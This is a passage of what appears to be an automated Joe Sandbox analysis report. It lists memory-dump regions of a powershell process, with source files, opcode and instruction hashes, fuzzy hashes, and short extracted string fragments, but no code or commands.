                                                  • Instruction Fuzzy Hash: 3482B1B4A10215DFE724DB68C851FAABBB2EB85304F20C6ADD50A6B744CB35ED81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$4'tq$tL6k$x.5k$-5k
                                                  • API String ID: 0-1065264860
                                                  • Opcode ID: 459b10f2c02bce953fc4fa4e6b5d8343b181664cba91a69f1dc5d1a705d0f7f7
                                                  • Instruction ID: 843b36bc396517e5590c1e5e76774121aa3df5104b6a479180b27b5f29c1f3c9
                                                  • Opcode Fuzzy Hash: 459b10f2c02bce953fc4fa4e6b5d8343b181664cba91a69f1dc5d1a705d0f7f7
                                                  • Instruction Fuzzy Hash: 59729DB4A10655CFE720DB68C850FAABBB2EB85304F20C69DD50A6B754CB35ED81CF61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$4'tq$tL6k$x.5k$-5k
                                                  • API String ID: 0-3869996683
                                                  • Opcode ID: 915ad5faa8ba6cc99698dc80ed0006c158e9a51711c6ff3ceb7a7b7ac0a77e7d
                                                  • Instruction ID: a708b9a4540721d12ba05961adc3d09e53f4bff78d4497012bf31deb3f3687b3
                                                  • Opcode Fuzzy Hash: 915ad5faa8ba6cc99698dc80ed0006c158e9a51711c6ff3ceb7a7b7ac0a77e7d
                                                  • Instruction Fuzzy Hash: 0052AFB4A10615DFE720DB68C950FAEBBB2EB84304F20C699D54A6B744CB35ED81CF61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$(fDl$4'tq$tL6k$x.5k$-5k
                                                  • API String ID: 0-3869996683
                                                  • Opcode ID: 249bacb03f44f18ca9d62dea9b037bbe460aa9d2b8b32fad1a1157334d695793
                                                  • Instruction ID: 4d4356b77855e43aacceecbe6f62c24179487a86a81d8625149d691a039f81c6
                                                  • Opcode Fuzzy Hash: 249bacb03f44f18ca9d62dea9b037bbe460aa9d2b8b32fad1a1157334d695793
                                                  • Instruction Fuzzy Hash: 1E4281B4B102159FE724DB68C950FAABBB2EF89304F20C5A9D40A6B745CB35ED81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$:l
                                                  • API String ID: 0-2577205836
                                                  • Opcode ID: ac502cce55fe75eeb180d2cad788a47ce48112dbc068041bdd057650a5bb8598
                                                  • Instruction ID: 470b8d5a4d5424b9fca204f2293897a61b13e5c58d36f3c826aa495ffa77a3a9
                                                  • Opcode Fuzzy Hash: ac502cce55fe75eeb180d2cad788a47ce48112dbc068041bdd057650a5bb8598
                                                  • Instruction Fuzzy Hash: 6A825BB8B10215DFE724CBA8C451FAABBB2EB94304F21825DD9156F352CB76AC41CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'tq$4'tq$4'tq$4'tq$tPtq$tPtq$tPtq$tPtq$$tq
                                                  • API String ID: 0-3686497533
                                                  • Opcode ID: baf4403bbea3b2adbcded7ffd8204f9e85884c417e831d2b0e0481c6a154e49e
                                                  • Instruction ID: 15aca52f33d6ab9704029645058e43e879967d6aa5b06361236cb42d2b2a4717
                                                  • Opcode Fuzzy Hash: baf4403bbea3b2adbcded7ffd8204f9e85884c417e831d2b0e0481c6a154e49e
                                                  • Instruction Fuzzy Hash: B9325DB4B24209DFD714CB98C452FAABBB2EF85304F248169E9059F796CB72DC41CB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$4'tq$4Al$tL6k$x.5k
                                                  • API String ID: 0-2697914884
                                                  • Opcode ID: b40abe2de7da6a282a6c0e07a2f3cb2ff94ee733cba2b170643557444e1ff7cf
                                                  • Instruction ID: d6d58cb48804399dcd63db503ebd5df38624f81aeb68c7454fc80e49d51852ba
                                                  • Opcode Fuzzy Hash: b40abe2de7da6a282a6c0e07a2f3cb2ff94ee733cba2b170643557444e1ff7cf
                                                  • Instruction Fuzzy Hash: A8124BB4E20256CFEB20CB24C951FAAB7B2FB55300F1186A9D509AB750CB75EE81CF11
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$4'tq$4Al$tL6k$x.5k
                                                  • API String ID: 0-2697914884
                                                  • Opcode ID: c7dba574052b502f0956d822bc8791e9d00f6ed9293b267c650bd91c9d52ddb8
                                                  • Instruction ID: 0e36113260e5c89624bf761ad913a724bd0a94797d7f385d1530b1d39168c196
                                                  • Opcode Fuzzy Hash: c7dba574052b502f0956d822bc8791e9d00f6ed9293b267c650bd91c9d52ddb8
                                                  • Instruction Fuzzy Hash: ED124BB4E20256CFEB20CB24C951FAAB7B2FB55300F1186A9D509AB750CB75EE81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$4'tq$4'tq$4'tq$4'tq$x.5k$-5k
                                                  • API String ID: 0-3887192946
                                                  • Opcode ID: d844249fe59224132a195b8ac43dc1db56734b78f6b20af0811c90d508ab605c
                                                  • Instruction ID: 662b9f648ea3426a1fb2397f1028fccb302cf6b40a0c49c9cd0ab7d6a6578493
                                                  • Opcode Fuzzy Hash: d844249fe59224132a195b8ac43dc1db56734b78f6b20af0811c90d508ab605c
                                                  • Instruction Fuzzy Hash: A5E1ACB4B202459BDB14EBA8C461F6FBBB2AF98300F24C269D4016F395DB75DC41CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$4'tq$4'tq$x.5k$-5k
                                                  • API String ID: 0-4198415557
                                                  • Opcode ID: e63aebea4eedf65fb1a7e28b6bdc655c12a76607bda25b8418e6c117e3475e46
                                                  • Instruction ID: 2fb3f95902dfd40c36dfaa3b446a847713087f5e8d1523874f490b087966c0bc
                                                  • Opcode Fuzzy Hash: e63aebea4eedf65fb1a7e28b6bdc655c12a76607bda25b8418e6c117e3475e46
                                                  • Instruction Fuzzy Hash: 07C1BFB0A202459FDB14DBA8C961FAEBFB2AF98314F24C259D8046F355CB75EC41CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$h27k$tL6k
                                                  • API String ID: 0-760734154
                                                  • Opcode ID: 9f9c951c139b9978aa0e6d80b50132b6452fec18867d07bddedb25436680d6d8
                                                  • Instruction ID: 7f7f90c2f38b38cec93ede509270b3e173d447c1aafbd736a3abf91cb937cb5f
                                                  • Opcode Fuzzy Hash: 9f9c951c139b9978aa0e6d80b50132b6452fec18867d07bddedb25436680d6d8
                                                  • Instruction Fuzzy Hash: 8961B2B4A20256DFEB34CF64C851F69BBB2EB55300F2086ADD5096B741CB35EC81CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tPtq$tPtq
                                                  • API String ID: 0-382218762
                                                  • Opcode ID: 91c04b53f5960fd1d31274de6fa2b294f6e64590a2bd74a982e0320794c381f0
                                                  • Instruction ID: 011b227cba3c60372e92464223f2746dc6872bfb37f76d1a8fec1bcdf938b171
                                                  • Opcode Fuzzy Hash: 91c04b53f5960fd1d31274de6fa2b294f6e64590a2bd74a982e0320794c381f0
                                                  • Instruction Fuzzy Hash: CB5158B172434ACFCB31CBA98C01B6ABBA2EF92311F18817FD505CB295DA71D841C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl
                                                  • API String ID: 0-3632875565
                                                  • Opcode ID: 854c45ca884fe44954b3518eb217aca691b49f25d0855d9b9035433aad8f04c1
                                                  • Instruction ID: a7ceaec354caa88ddf3702ec15ea021ac2700d856a94642529211f9decf72e8f
                                                  • Opcode Fuzzy Hash: 854c45ca884fe44954b3518eb217aca691b49f25d0855d9b9035433aad8f04c1
                                                  • Instruction Fuzzy Hash: 98518BB4A20246DFD720DFA8C460FAABFB2EB64304F20826DDA146F352CB75D841CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: x.5k
                                                  • API String ID: 0-3310175971
                                                  • Opcode ID: d10d569c617796b10c9ce2a362c497173da3bed7504c49ac2c2e6f17c3d93a65
                                                  • Instruction ID: e0a4696228c3a245582a3ab0dad1b065c6e6291f0b6fe3e136d4ffe8ec99ab45
                                                  • Opcode Fuzzy Hash: d10d569c617796b10c9ce2a362c497173da3bed7504c49ac2c2e6f17c3d93a65
                                                  • Instruction Fuzzy Hash: 643180B4750104ABE714E7A8C865FAF7AA3EF84750F24C128E9016F395CF799D418BE1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2049128195.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8d50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 617b0692c036fa0e298e853d45fa3571cabd8fbb0916e87d31df8ff741f9aa0a
                                                  • Instruction ID: dc163b7ee17f6ff69a7b3b72e21e3f7ddd106adc85157366cc6116fa471408a6
                                                  • Opcode Fuzzy Hash: 617b0692c036fa0e298e853d45fa3571cabd8fbb0916e87d31df8ff741f9aa0a
                                                  • Instruction Fuzzy Hash: 43F1F874A01619DFDF05CFA8C484AAEBBB2BF88351F258259E805AB355C731ED81CF90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2049128195.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8d50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23cc8414949db3660675425458bf1663c62066a6a6670e0f11f1e854a9480ca3
                                                  • Instruction ID: caa97a07e13d4a342f7a41e60cb41e388a506ef838c0b0a18f3b996e4b40ffe9
                                                  • Opcode Fuzzy Hash: 23cc8414949db3660675425458bf1663c62066a6a6670e0f11f1e854a9480ca3
                                                  • Instruction Fuzzy Hash: 22F1D774A00219DFDF15CF98D484AAEBBB2FF88355F258259E805AB355C731ED82CB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1f5adb0cd3aebe02ea467b9ae4b595045253d0aeaa9da770a0c5bba6a2613a7
                                                  • Instruction ID: 6b8a7b9fa78ff5ae21e021500ba82fc8d5bf801bd9d0387674dcaad612fa973d
                                                  • Opcode Fuzzy Hash: b1f5adb0cd3aebe02ea467b9ae4b595045253d0aeaa9da770a0c5bba6a2613a7
                                                  • Instruction Fuzzy Hash: C63129B1720156CBCB24DA79CC017AEF7A6EF94314F24863ED816DB240EB36D941C790
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eda084d9e2f07707850aede7aaedd8032a7c51c8b38af3aa7ec596c49c7a1d0d
                                                  • Instruction ID: ec0287178e0528fa1853d80ef716c6e6ac5a7ce02ecfba7e11790956cb9165f8
                                                  • Opcode Fuzzy Hash: eda084d9e2f07707850aede7aaedd8032a7c51c8b38af3aa7ec596c49c7a1d0d
                                                  • Instruction Fuzzy Hash: 99316CF57201519BD721DB788812D6BBBA39FE5354B24C1AEC5019F741EE71CD01C7A2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2049128195.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8d50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bc5047ffec9290285275991e3edbd7a2d14609acee32231bf7d7e9fe82fdaac
                                                  • Instruction ID: 15b9869c3adab2e6ea0c7b1f20ba6d90b51ff57c05eb6433b5304aff7a09890e
                                                  • Opcode Fuzzy Hash: 9bc5047ffec9290285275991e3edbd7a2d14609acee32231bf7d7e9fe82fdaac
                                                  • Instruction Fuzzy Hash: 7541FB74A005099FCB55CF9CD4849AEBBF2FF48324F248269E915A73A4C735EC52CB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2049128195.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8d50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aec186c152ddbfe66038d3055c8c3f1ab0c6edcce42b14be0deeb5f3f19cfd42
                                                  • Instruction ID: 96f7a926cbf291adee4f1449ecbb63c6a3bac0dc93c737bbb818a7afef460e54
                                                  • Opcode Fuzzy Hash: aec186c152ddbfe66038d3055c8c3f1ab0c6edcce42b14be0deeb5f3f19cfd42
                                                  • Instruction Fuzzy Hash: B4411B74A005199FCB15CF9CC8809AEBBF2FF88361B258269E955E7395C731EC41CB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 164a125536d6f83a20170843be12e6589cfea2c9371de1c105fffcaddd4ea093
                                                  • Instruction ID: 12e2ed2c5dea8ca24f6686457b95d23287b8914da38fe1f1f4aefcdc6094fdaa
                                                  • Opcode Fuzzy Hash: 164a125536d6f83a20170843be12e6589cfea2c9371de1c105fffcaddd4ea093
                                                  • Instruction Fuzzy Hash: 593126F53342528BDB15DA248412B7ABBB2DFA2210F248A6ED502DF290EF79D951C361
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d84ceedb3768b329fdfcd7de3922afa13f8d142f59ac9cdd8fbe10f193d84f57
                                                  • Instruction ID: 11faa00cb593af7ae2ec39ad486e80144182cacf8434868ba1c87085828708ef
                                                  • Opcode Fuzzy Hash: d84ceedb3768b329fdfcd7de3922afa13f8d142f59ac9cdd8fbe10f193d84f57
                                                  • Instruction Fuzzy Hash: D72187F132025A97EB24D6BA8812B3BB68ADBD5311F34C52D9D05CB382DD76C85083A0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea4ce92e4b6d5b497c28474426b851bf8313f828a095fb6d4ee03150111dbdc5
                                                  • Instruction ID: e16d467d3432e7941220c0be2134cc7bacb3b8bd497daeacf7d496c8d17ae24e
                                                  • Opcode Fuzzy Hash: ea4ce92e4b6d5b497c28474426b851bf8313f828a095fb6d4ee03150111dbdc5
                                                  • Instruction Fuzzy Hash: 112179F53283CAABEB208A758811B367BA5DF92310F38855AD940DF2C3D96A8940C371
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2049128195.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8d50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 422a138a48664063bab8db8ebb644827c23d653940b9d62b2aa6f4f5d6bccf52
                                                  • Instruction ID: 21213975bbad6bf77de80765127d9703c4ae9e5492e7e74cbbd23a8b13d1be47
                                                  • Opcode Fuzzy Hash: 422a138a48664063bab8db8ebb644827c23d653940b9d62b2aa6f4f5d6bccf52
                                                  • Instruction Fuzzy Hash: BB213B31A00519DFCF05CB9CC894AAEB7B2FF88365B248659E916E7394C735EC52CB90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2049128195.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8d50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d8469e853a907def0dfcdd0cf47bb31cbda9ed5acb84c05bc3f85fae9dcda20
                                                  • Instruction ID: f7c354152d4edf2dd4b706db4c4d85fa00834f23f6416d559bb852ba4ba82e1d
                                                  • Opcode Fuzzy Hash: 9d8469e853a907def0dfcdd0cf47bb31cbda9ed5acb84c05bc3f85fae9dcda20
                                                  • Instruction Fuzzy Hash: 12216F75A00119DFCF05CA9CC890ABEB7B2FF89354B248659D916E73A0C736EC52CB50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2039795604.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b0d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c837a722a62dca897b8353bef7eb572a5012b0ea2a20885a79e8488b46da780
                                                  • Instruction ID: 5ed64b37120275b5736004940faec44fd4a22a54eef574e477c96111ef7443f4
                                                  • Opcode Fuzzy Hash: 0c837a722a62dca897b8353bef7eb572a5012b0ea2a20885a79e8488b46da780
                                                  • Instruction Fuzzy Hash: DA21AE76504240DFDB16CF10D5C0B26BFB2FB84314F24C5A9DD094A656C33AD85ACB51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2039795604.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b0d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d040eeb6f88efe593e20d3d4b9c2af0b9889f2dbcad628dee7d2e01e1e11334
                                                  • Instruction ID: 7c093fdb728b4778d36977ee02cd3b5e32da9db30c6c612fbec226e0081f4bdc
                                                  • Opcode Fuzzy Hash: 4d040eeb6f88efe593e20d3d4b9c2af0b9889f2dbcad628dee7d2e01e1e11334
                                                  • Instruction Fuzzy Hash: 2A01A7715053409EE7208A56C9D4B67BFD8EF45324F18C599ED4D4F2C2E2799841C6B1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2039795604.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b0d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbba2015e95b33f8bb430141bcb207b344ce1a2f6e91236a74fba5641bf62ca2
                                                  • Instruction ID: 243f2d7f284a39ad69c538bb1c5b3b14ce45cef81bb147083e88fb8db678c960
                                                  • Opcode Fuzzy Hash: bbba2015e95b33f8bb430141bcb207b344ce1a2f6e91236a74fba5641bf62ca2
                                                  • Instruction Fuzzy Hash: D2F0CD72404340AEEB208A1AC984B63FFD8EB51334F18C59AED8C4F2C6C2799840CAB1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2049128195.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8d50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ef015f8b8654187bf038f4825d6f28e507b807d68925cd8e85297225855ad2b
                                                  • Instruction ID: 5157693851eed9c0395c047b8591a86dbd78e75b7f7717602d3353096238d20b
                                                  • Opcode Fuzzy Hash: 9ef015f8b8654187bf038f4825d6f28e507b807d68925cd8e85297225855ad2b
                                                  • Instruction Fuzzy Hash: 72F0F932A00509AFCF15DB88D9808ADFB76FF88320B248119E915A7260C7329D62DB50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 784904ea483e79c8508aad581e49cf2bf8094df1b4b390170fe13513af199abb
                                                  • Instruction ID: 247ce8bc36ffdfb923e156edaba84bcc6876ca9ea7452783fdf7376f121d6842
                                                  • Opcode Fuzzy Hash: 784904ea483e79c8508aad581e49cf2bf8094df1b4b390170fe13513af199abb
                                                  • Instruction Fuzzy Hash: 07A0127020010457C100C600C841801B350AB84204714C08854044F382DF63D8038740
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fDl$(fDl$(fDl$(fDl$(fDl$4'tq$4'tq$4'tq$4'tq$tL6k$tL6k$x.5k$-5k
                                                  • API String ID: 0-2731444297
                                                  • Opcode ID: d7913742875d05a61beeb15ec9fa38a97e9dd6758f22ea813a7606b9843af999
                                                  • Instruction ID: f847353a45ebd4bdeb6a49c173865b288e68bba42cdf012773319cdab78e0984
                                                  • Opcode Fuzzy Hash: d7913742875d05a61beeb15ec9fa38a97e9dd6758f22ea813a7606b9843af999
                                                  • Instruction Fuzzy Hash: 152240B4A102199FDB24DB64C950FDABBB2EF89304F208599D8096F751CB35EE81CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'tq$4'tq$84Bl$84Bl$d%zq$d%zq$d%zq$d%zq$tPtq$tPtq$$tq
                                                  • API String ID: 0-2658049242
                                                  • Opcode ID: 14937c8a16cfa64c81b89f3fbaa4a21be7c77f1e3813c3de0c636fb6165f2fd1
                                                  • Instruction ID: 6bf60aa86459d069086a1586460d1379a8c0ebb1370adcb7cbf325412acf92d7
                                                  • Opcode Fuzzy Hash: 14937c8a16cfa64c81b89f3fbaa4a21be7c77f1e3813c3de0c636fb6165f2fd1
                                                  • Instruction Fuzzy Hash: 398108B2B242469FCB25CE68D910B6ABBA3EF98310F24865DDC019F254DB31DD41C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'tq$4'tq$4'tq$4'tq$$tq$$tq$$tq$:l$:l
                                                  • API String ID: 0-79853153
                                                  • Opcode ID: 31aff7258d51d1ea15110684b553f28d5d9604aade91ee239a62c48e067280fd
                                                  • Instruction ID: 34529472da826c87fbc844fe86eb3a5f852a849827961d31344cde9e0f692ba8
                                                  • Opcode Fuzzy Hash: 31aff7258d51d1ea15110684b553f28d5d9604aade91ee239a62c48e067280fd
                                                  • Instruction Fuzzy Hash: 456126F1724246DFDB35CAB98C1167ABBA2EFD2610F24826EDA45CB241DA31CD41C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_72c0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'tq$4'tq$$tq$$tq$$tq$:l$:l
                                                  • API String ID: 0-148692931
                                                  • Opcode ID: b5931f8ea55a966f9bb40665852661e9dd902203724020a04c01666b538bf0b2
                                                  • Instruction ID: aa17c70321a1210a7916ea83d81f77fe11a38ab77ec974c06a3528fd27a2dffc
                                                  • Opcode Fuzzy Hash: b5931f8ea55a966f9bb40665852661e9dd902203724020a04c01666b538bf0b2
                                                  • Instruction Fuzzy Hash: 535126B17242478FDB26DA798801B66BBA6EFE2250F24C1AFD445CB351DA31C841CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2045005638.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
